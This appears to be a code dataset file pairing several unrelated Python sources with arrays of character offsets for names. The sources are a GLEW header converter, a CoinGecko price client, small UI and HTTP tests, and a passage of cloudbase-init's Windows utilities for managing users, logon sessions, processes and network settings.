func = re.sub(r"\s+", " ", func) # collapse whitespace
func = re.sub(r"\s*([()])\s*", r"\1", func) # no whitespace near brackets
func = re.sub(r"\s*,\s*", r", ", func) # only whitespace __after__ comma
func = re.sub(
r"\s*(\*+)\s*", r" \1", func
) # beautify pointers in functions
# cython doesn't support (void), need to do () for no arguments instead
func = re.sub(r"\(void\)", "()", func)
# keywords...
for keyword in keywords:
func = re.sub(r"\b%s\b" % keyword, keyword + "_", func)
return func
data += "\n".join(" " + mod_func(func) for func in function_defs)
fout.write(data)
with (dest / "unhandled_glew.h").open("w") as fout:
data = "\n".join(
lines[linenr] for linenr in range(len(lines)) if linenr not in handled_lines
)
data = re.sub("\n\n+", "\n", data)
fout.write(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("glew_header_loc")
parser.add_argument("destination")
args = parser.parse_args()
generate_pxd(args.glew_header_loc, dest=args.destination)
| [
[
[
97,
105
],
[
7787,
7795
]
],
[
[
113,
115
]
],
[
[
123,
130
],
[
5666,
5673
]
],
[
[
138,
140
],
[
300,
302
],
[
582,
584
],
[
984,
986
],
[
1384,
1386
],
[
1953,
1955
],
[
2374,
2376
],
[
2734,
2736
],
[
3077,
3079
],
[
7692,
7694
],
[
6752,
6754
],
[
6820,
6822
],
[
6907,
6909
],
[
6993,
6995
],
[
7198,
7200
],
[
7317,
7319
]
],
[
[
147,
159
],
[
7930,
7942
]
],
[
[
7778,
7784
],
[
7817,
7823
],
[
7860,
7866
],
[
7906,
7912
]
],
[
[
7899,
7903
],
[
7943,
7947
],
[
7970,
7974
]
]
] |
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
base_url = 'https://api.coingecko.com/'
def __init__(self):
self.http_session = requests.Session()
def _get_price(self, url: str, name: str):
try:
response = self.http_session.get(url, timeout=10)
if not response.ok:
raise CannotGetPrice
# Result is returned with lowercased `token_address`
price = response.json().get(name)
if price and price.get('usd'):
return price['usd']
else:
raise CannotGetPrice(f'Price from url={url} is {price}')
except (ValueError, IOError) as e:
logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
raise CannotGetPrice from e
def get_price(self, name: str) -> float:
"""
:param name: coin name
:return: usd price for token name, 0. if not found
"""
name = name.lower()
url = urljoin(self.base_url,
f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
return self._get_price(url, name)
def get_token_price(self, token_address: ChecksumAddress) -> float:
"""
:param token_address:
:return: usd price for token address, 0. if not found
"""
token_address = token_address.lower()
url = urljoin(self.base_url,
f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
return self._get_price(url, token_address)
def get_ewt_usd_price(self) -> float:
return self.get_price('energy-web-token')
| [
[
[
7,
14
],
[
193,
200
]
],
[
[
40,
47
],
[
1213,
1220
],
[
1603,
1610
]
],
[
[
56,
64
],
[
343,
351
]
],
[
[
88,
103
],
[
1400,
1415
]
],
[
[
168,
182
],
[
539,
553
],
[
784,
798
],
[
989,
1003
]
],
[
[
184,
190
],
[
890,
896
]
],
[
[
229,
244
]
]
] |
# -*- coding: utf-8 -*-
from selenium_tests.UserDriverTest import UserDriverTest
from selenium.webdriver.common.by import By
class TestHideApplication(UserDriverTest):
def test_hide_application(self):
self.wait_until_application_list_loaded()
self.type_text_in_element_located(By.ID, "search-input", "foobarheho")
self.wait_until_text_inside_element_located(By.ID, "applistentries", "")
| [
[
[
66,
80
],
[
153,
167
]
],
[
[
122,
124
],
[
300,
302
],
[
390,
392
]
],
[
[
133,
152
]
]
] |
import anachronos
from e2e_test.runner import http
class ExceptionResourceTest(anachronos.TestCase):
def setUp(self):
self.http = http.with_path("/api/error")
def test_got500OnInternalServerError(self):
response = self.http.get("")
self.assertEqual(500, response.status_code)
def test_got404OnResourceNotFound(self):
response = self.http.get("/inexistent-path")
self.assertEqual(404, response.status_code)
def test_got405MethodNotAllowed(self):
response = self.http.post("")
self.assertEqual(405, response.status_code)
def test_givenNullPointerException_thenReturn500InternalServerError(self):
response = self.http.get("/none")
self.assertEqual(500, response.status_code)
if __name__ == '__main__':
anachronos.run_tests()
| [
[
[
7,
17
],
[
82,
92
],
[
809,
819
]
],
[
[
47,
51
],
[
146,
150
]
],
[
[
60,
81
]
]
] |
from st_library import Library
st_lib = Library()
st_lib.set_token('token')
st_lib.set_config_id('52db99d3-edfb-44c5-b97a-f09df4402081')
print(st_lib.unstruct_data.download_file("19a29b9b-bea2-40fb-89c4-555bba829539","image.jpg"))
| [
[
[
23,
30
],
[
41,
48
]
],
[
[
32,
38
],
[
51,
57
],
[
77,
83
],
[
144,
150
]
]
] |
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
class Win32_PROFILEINFO(ctypes.Structure):
_fields_ = [
('dwSize', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('lpUserName', wintypes.LPWSTR),
('lpProfilePath', wintypes.LPWSTR),
('lpDefaultPath', wintypes.LPWSTR),
('lpServerName', wintypes.LPWSTR),
('lpPolicyPath', wintypes.LPWSTR),
('hprofile', wintypes.HANDLE)
]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
_fields_ = [
('lgrmi3_domainandname', wintypes.LPWSTR)
]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
_fields_ = [
('dwForwardDest', wintypes.DWORD),
('dwForwardMask', wintypes.DWORD),
('dwForwardPolicy', wintypes.DWORD),
('dwForwardNextHop', wintypes.DWORD),
('dwForwardIfIndex', wintypes.DWORD),
('dwForwardType', wintypes.DWORD),
('dwForwardProto', wintypes.DWORD),
('dwForwardAge', wintypes.DWORD),
('dwForwardNextHopAS', wintypes.DWORD),
('dwForwardMetric1', wintypes.DWORD),
('dwForwardMetric2', wintypes.DWORD),
('dwForwardMetric3', wintypes.DWORD),
('dwForwardMetric4', wintypes.DWORD),
('dwForwardMetric5', wintypes.DWORD)
]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
_fields_ = [
('dwNumEntries', wintypes.DWORD),
('table', Win32_MIB_IPFORWARDROW * 1)
]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
_fields_ = [
('dwOSVersionInfoSize', wintypes.DWORD),
('dwMajorVersion', wintypes.DWORD),
('dwMinorVersion', wintypes.DWORD),
('dwBuildNumber', wintypes.DWORD),
('dwPlatformId', wintypes.DWORD),
('szCSDVersion', wintypes.WCHAR * 128),
('wServicePackMajor', wintypes.WORD),
('wServicePackMinor', wintypes.WORD),
('wSuiteMask', wintypes.WORD),
('wProductType', wintypes.BYTE),
('wReserved', wintypes.BYTE)
]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('InterfaceClassGuid', disk.GUID),
('Flags', wintypes.DWORD),
('Reserved', ctypes.POINTER(wintypes.ULONG))
]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('DevicePath', ctypes.c_byte * 2)
]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
_fields_ = [
('DeviceType', wintypes.DWORD),
('DeviceNumber', wintypes.DWORD),
('PartitionNumber', wintypes.DWORD)
]
class Win32_STARTUPINFO_W(ctypes.Structure):
_fields_ = [
('cb', wintypes.DWORD),
('lpReserved', wintypes.LPWSTR),
('lpDesktop', wintypes.LPWSTR),
('lpTitle', wintypes.LPWSTR),
('dwX', wintypes.DWORD),
('dwY', wintypes.DWORD),
('dwXSize', wintypes.DWORD),
('dwYSize', wintypes.DWORD),
('dwXCountChars', wintypes.DWORD),
('dwYCountChars', wintypes.DWORD),
('dwFillAttribute', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('wShowWindow', wintypes.WORD),
('cbReserved2', wintypes.WORD),
('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
('hStdInput', wintypes.HANDLE),
('hStdOutput', wintypes.HANDLE),
('hStdError', wintypes.HANDLE),
]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', wintypes.HANDLE),
('hThread', wintypes.HANDLE),
('dwProcessId', wintypes.DWORD),
('dwThreadId', wintypes.DWORD),
]
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
wintypes.LPCWSTR,
wintypes.LPWSTR,
ctypes.c_void_p,
ctypes.c_void_p,
wintypes.BOOL,
wintypes.DWORD,
ctypes.c_void_p,
wintypes.LPCWSTR,
ctypes.POINTER(
Win32_STARTUPINFO_W),
ctypes.POINTER(
Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
ntdll.RtlGetVersion.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
wintypes.DWORD, wintypes.ULARGE_INTEGER]
ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
wintypes.DWORD,
wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD,
ctypes.POINTER(
wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
iphlpapi.GetIpForwardTable.argtypes = [
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
ctypes.POINTER(wintypes.ULONG),
wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
wintypes.LPWSTR,
ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
wintypes.LPCWSTR,
wintypes.HANDLE,
wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
ctypes.POINTER(disk.GUID),
wintypes.DWORD,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
NERR_GroupNotFound = 2220
NERR_UserNotFound = 2221
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_INVALID_NAME = 123
ERROR_NO_DATA = 232
ERROR_MORE_DATA = 234
ERROR_NO_SUCH_MEMBER = 1387
ERROR_MEMBER_IN_ALIAS = 1378
ERROR_INVALID_MEMBER = 1388
ERROR_NO_MORE_FILES = 18
STATUS_REVISION_MISMATCH = 0xC0000059
ADS_UF_PASSWORD_EXPIRED = 0x800000
PASSWORD_CHANGED_FLAG = 1
INVALID_HANDLE_VALUE = 0xFFFFFFFF
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
MAX_PATH = 260
DIGCF_PRESENT = 2
DIGCF_DEVICEINTERFACE = 0x10
DRIVE_CDROM = 5
INFINITE = 0xFFFFFFFF
CREATE_NEW_CONSOLE = 0x10
LOGON32_LOGON_BATCH = 4
LOGON32_LOGON_INTERACTIVE = 2
LOGON32_LOGON_SERVICE = 5
LOGON32_PROVIDER_DEFAULT = 0
EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
SERVICE_STATUS_STOPPED = "Stopped"
SERVICE_STATUS_START_PENDING = "Start Pending"
SERVICE_STATUS_STOP_PENDING = "Stop Pending"
SERVICE_STATUS_RUNNING = "Running"
SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
SERVICE_STATUS_PAUSED = "Paused"
SERVICE_STATUS_UNKNOWN = "Unknown"
SERVICE_START_MODE_AUTOMATIC = "Automatic"
SERVICE_START_MODE_MANUAL = "Manual"
SERVICE_START_MODE_DISABLED = "Disabled"
_SERVICE_START_TYPE_MAP = {
SERVICE_START_MODE_AUTOMATIC:
win32service.SERVICE_AUTO_START,
SERVICE_START_MODE_MANUAL:
win32service.SERVICE_DEMAND_START,
SERVICE_START_MODE_DISABLED:
win32service.SERVICE_DISABLED}
_SERVICE_STATUS_MAP = {
win32service.SERVICE_CONTINUE_PENDING:
SERVICE_STATUS_CONTINUE_PENDING,
win32service.SERVICE_PAUSE_PENDING:
SERVICE_STATUS_PAUSE_PENDING,
win32service.SERVICE_PAUSED:
SERVICE_STATUS_PAUSED,
win32service.SERVICE_RUNNING:
SERVICE_STATUS_RUNNING,
win32service.SERVICE_START_PENDING:
SERVICE_STATUS_START_PENDING,
win32service.SERVICE_STOP_PENDING:
SERVICE_STATUS_STOP_PENDING,
win32service.SERVICE_STOPPED:
SERVICE_STATUS_STOPPED,
}
ComputerNamePhysicalDnsHostname = 5
_config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
_service_name = 'cloudbase-init'
_FW_IP_PROTOCOL_TCP = 6
_FW_IP_PROTOCOL_UDP = 17
_FW_SCOPE_ALL = 0
_FW_SCOPE_LOCAL_SUBNET = 1
VER_NT_WORKSTATION = 1
def __init__(self):
self._network_team_manager = None
def reboot(self):
with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
ret_val = advapi32.InitiateSystemShutdownExW(
0, "Cloudbase-Init reboot",
0, True, True, 0)
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Reboot failed: %r")
def user_exists(self, username):
try:
self._get_user_info(username, 1)
return True
except exception.ItemNotFoundException:
# User not found
return False
def create_user(self, username, password, password_expires=False):
user_info = {
"name": username,
"password": password,
"priv": win32netcon.USER_PRIV_USER,
"flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
}
if not password_expires:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserAdd(None, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create user failed: %s" % ex.args[2])
def rename_user(self, username, new_username):
user_info = {
"name": new_username,
}
try:
win32net.NetUserSetInfo(None, username, 0, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Renaming user failed: %s" % ex.args[2])
def set_user_info(self, username, full_name=None,
disabled=False, expire_interval=None):
user_info = self._get_user_info(username, 2)
if full_name:
user_info["full_name"] = full_name
if disabled:
user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
else:
user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
if expire_interval is not None:
user_info["acct_expires"] = int(expire_interval)
else:
user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
try:
win32net.NetUserSetInfo(None, username, 2, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
LOG.debug(ex)
raise exception.CloudbaseInitException(
"Setting user info failed: %s" % ex.args[2])
def enum_users(self):
usernames = []
resume_handle = 0
while True:
try:
users_info, total, resume_handle = win32net.NetUserEnum(
None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Enumerating users failed: %s" % ex.args[2])
usernames += [u["name"] for u in users_info]
if not resume_handle:
return usernames
def is_builtin_admin(self, username):
sid = self.get_user_sid(username)
return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
def _get_user_info(self, username, level):
try:
return win32net.NetUserGetInfo(None, username, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Failed to get user info: %s" % ex.args[2])
def set_user_password(self, username, password, password_expires=False):
user_info = self._get_user_info(username, 1)
user_info["password"] = password
if password_expires:
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
else:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserSetInfo(None, username, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Set user password failed: %s" % ex.args[2])
def change_password_next_logon(self, username):
"""Force the given user to change the password at next logon."""
user_info = self._get_user_info(username, 4)
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
user_info["password_expired"] = 1
try:
win32net.NetUserSetInfo(None, username, 4, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Setting password expiration failed: %s" % ex.args[2])
def group_exists(self, group):
try:
self._get_group_info(group, 1)
return True
except exception.ItemNotFoundException:
# Group not found
return False
def _get_group_info(self, group, level):
try:
return win32net.NetLocalGroupGetInfo(None, group, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_GroupNotFound:
raise exception.ItemNotFoundException(
"Group not found: %s" % group)
else:
raise exception.CloudbaseInitException(
"Failed to get group info: %s" % ex.args[2])
def create_group(self, group, description=None):
group_info = {"name": group}
try:
win32net.NetLocalGroupAdd(None, 0, group_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create group failed: %s" % ex.args[2])
@staticmethod
def _get_cch_referenced_domain_name(domain_name):
return wintypes.DWORD(
ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
def _get_user_sid_and_domain(self, username):
sid = ctypes.create_string_buffer(1024)
cbSid = wintypes.DWORD(ctypes.sizeof(sid))
domainName = ctypes.create_unicode_buffer(1024)
cchReferencedDomainName = self._get_cch_referenced_domain_name(
domainName)
sidNameUse = wintypes.DWORD()
ret_val = advapi32.LookupAccountNameW(
0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot get user SID: %r")
return sid, domainName.value
def add_user_to_local_group(self, username, groupname):
lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
lmi.lgrmi3_domainandname = six.text_type(username)
ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
3, ctypes.pointer(lmi), 1)
if ret_val == self.NERR_GroupNotFound:
raise exception.CloudbaseInitException("Group '%s' not found"
% groupname)
elif ret_val == self.ERROR_ACCESS_DENIED:
raise exception.CloudbaseInitException('Access denied')
elif ret_val == self.ERROR_NO_SUCH_MEMBER:
raise exception.CloudbaseInitException("Username '%s' not found"
% username)
elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
# The user is already a member of the group
pass
elif ret_val == self.ERROR_INVALID_MEMBER:
raise exception.CloudbaseInitException('Invalid user')
elif ret_val != 0:
raise exception.CloudbaseInitException('Unknown error')
def get_user_sid(self, username):
try:
user_info = self._get_user_info(username, 4)
return str(user_info["user_sid"])[6:]
except exception.ItemNotFoundException:
# User not found
pass
def create_user_logon_session(self, username, password, domain='.',
load_profile=True,
logon_type=LOGON32_LOGON_INTERACTIVE):
LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
{"username": username, "domain": domain})
token = wintypes.HANDLE()
ret_val = advapi32.LogonUserW(six.text_type(username),
six.text_type(domain),
six.text_type(password),
logon_type,
self.LOGON32_PROVIDER_DEFAULT,
ctypes.byref(token))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"User logon failed: %r")
if load_profile:
pi = Win32_PROFILEINFO()
pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
pi.lpUserName = six.text_type(username)
ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
if not ret_val:
kernel32.CloseHandle(token)
raise exception.WindowsCloudbaseInitException(
"Cannot load user profile: %r")
return token
def get_current_user(self):
"""Get the user account name from the underlying instance."""
buf_len = wintypes.ULONG(512)
buf = ctypes.create_unicode_buffer(512)
ret_val = secur32.GetUserNameExW(
self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
buf, ctypes.byref(buf_len))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"GetUserNameExW failed: %r")
return buf.value.split("\\")
def execute_process_as_user(self, token, args, wait=True,
new_console=False):
"""Executes processes as an user.
:param token: Represents the user logon session token, resulted from
running the 'create_user_logon_session' method.
:param args: The arguments with which the process will be run with.
:param wait: Specifies if it's needed to wait for the process
handler to finish up running all the operations
on the process object.
:param new_console: Specifies whether the process should run
under a new console or not.
:return: The exit code value resulted from the running process.
:rtype: int
"""
LOG.debug("Executing process as user, command line: %s", args)
proc_info = Win32_PROCESS_INFORMATION()
startup_info = Win32_STARTUPINFO_W()
startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
startup_info.lpDesktop = ""
flags = self.CREATE_NEW_CONSOLE if new_console else 0
cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
try:
ret_val = advapi32.CreateProcessAsUserW(
token, None, cmdline, None, None, False, flags, None, None,
ctypes.byref(startup_info), ctypes.byref(proc_info))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"CreateProcessAsUserW failed: %r")
if wait and proc_info.hProcess:
kernel32.WaitForSingleObject(
proc_info.hProcess, self.INFINITE)
exit_code = wintypes.DWORD()
if not kernel32.GetExitCodeProcess(
proc_info.hProcess, ctypes.byref(exit_code)):
raise exception.WindowsCloudbaseInitException(
"GetExitCodeProcess failed: %r")
return exit_code.value
finally:
if proc_info.hProcess:
kernel32.CloseHandle(proc_info.hProcess)
if proc_info.hThread:
kernel32.CloseHandle(proc_info.hThread)
def close_user_logon_session(self, token):
kernel32.CloseHandle(token)
def get_user_home(self, username):
user_sid = self.get_user_sid(username)
if user_sid:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\Windows NT\\CurrentVersion\\'
'ProfileList\\%s' % user_sid) as key:
return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
LOG.debug('Home directory not found for user %r', username)
return None
def sanitize_shell_input(self, value):
return value.replace('"', '\\"')
def set_host_name(self, new_host_name):
ret_val = kernel32.SetComputerNameExW(
self.ComputerNamePhysicalDnsHostname,
six.text_type(new_host_name))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot set host name: %r")
return True
def get_network_adapters(self):
"""Return available adapters as a list of tuples of (name, mac)."""
conn = wmi.WMI(moniker='//./root/cimv2')
# Get Ethernet adapters only
wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
if self.check_os_version(6, 0):
wql += ' AND PhysicalAdapter = True'
q = conn.query(wql)
return [(r.NetConnectionID, r.MACAddress) for r in q]
def get_dhcp_hosts_in_use(self):
dhcp_hosts = []
for net_addr in network.get_adapter_addresses():
if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
dhcp_hosts.append((net_addr["friendly_name"],
net_addr["mac_address"],
net_addr["dhcp_server"]))
return dhcp_hosts
def set_ntp_client_config(self, ntp_hosts):
base_dir = self._get_system_dir()
w32tm_path = os.path.join(base_dir, "w32tm.exe")
# Convert the NTP hosts list to a string, in order to pass
# it to w32tm.
ntp_hosts = ",".join(ntp_hosts)
args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
'/syncfromflags:manual', '/update']
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
@retry_decorator.retry_decorator(
max_retry_count=30, exceptions=exception.ItemNotFoundException)
def get_network_adapter_name_by_mac_address(self, mac_address):
iface_index_list = [
net_addr for net_addr
in network.get_adapter_addresses()
if net_addr["mac_address"] is not None and
net_addr["mac_address"].lower() == mac_address.lower()]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with MAC address "%s" not found' %
mac_address)
if len(iface_index_list) > 1:
raise exception.CloudbaseInitException(
'Multiple network interfaces with MAC address "%s" exist' %
mac_address)
return iface_index_list[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
